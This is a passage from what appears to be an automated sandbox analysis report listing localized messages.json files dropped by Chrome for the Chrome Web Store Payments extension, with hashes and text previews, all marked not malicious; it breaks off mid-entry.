                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):661
                                                                                                                                                            Entropy (8bit):4.450938335136508
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                                                                                                                            MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                            SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                            SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                            SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):637
                                                                                                                                                            Entropy (8bit):4.47253983486615
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                                                                                                                            MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                            SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                            SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                            SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):595
                                                                                                                                                            Entropy (8bit):4.467205425399467
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                                                                                                                            MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                                                                                                                            SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                                                                                                                            SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                                                                                                                            SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):647
                                                                                                                                                            Entropy (8bit):4.595421267152647
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                            MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                            SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                            SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                            SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):658
                                                                                                                                                            Entropy (8bit):4.5231229502550745
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                            MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                            SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                            SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                            SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):677
                                                                                                                                                            Entropy (8bit):4.552569602149629
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                            MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                            SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                            SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                            SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):835
                                                                                                                                                            Entropy (8bit):4.791154467711985
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                            MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                            SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                            SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                            SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):618
                                                                                                                                                            Entropy (8bit):4.56999230891419
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                            MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                            SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                            SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                            SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):683
                                                                                                                                                            Entropy (8bit):4.675370843321512
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                            MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                            SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                            SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                            SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):604
                                                                                                                                                            Entropy (8bit):4.465685261172395
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                            MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                            SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                            SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                            SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):603
                                                                                                                                                            Entropy (8bit):4.479418964635223
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                            MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                            SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                            SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                            SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):697
                                                                                                                                                            Entropy (8bit):5.20469020877498
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                            MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                            SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                            SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                            SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):631
                                                                                                                                                            Entropy (8bit):5.160315577642469
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                            MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                            SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                                                                                                                            SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                                                                                                                            SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):665
                                                                                                                                                            Entropy (8bit):4.66839186029557
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                                                                                                                            MD5:4CA644F875606986A9898D04BDAE3EA5
                                                                                                                                                            SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                                                                                                                            SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                            SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):671
                                                                                                                                                            Entropy (8bit):4.631774066483956
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                            MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                            SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                            SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                            SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nb\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):624
                                                                                                                                                            Entropy (8bit):4.555032032637389
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
                                                                                                                                                            MD5:93C459A23BC6953FF744C35920CD2AF9
                                                                                                                                                            SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                                                                                                                            SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                                                                                                                            SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):615
                                                                                                                                                            Entropy (8bit):4.4715318546237315
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                            MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                            SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                            SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                            SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
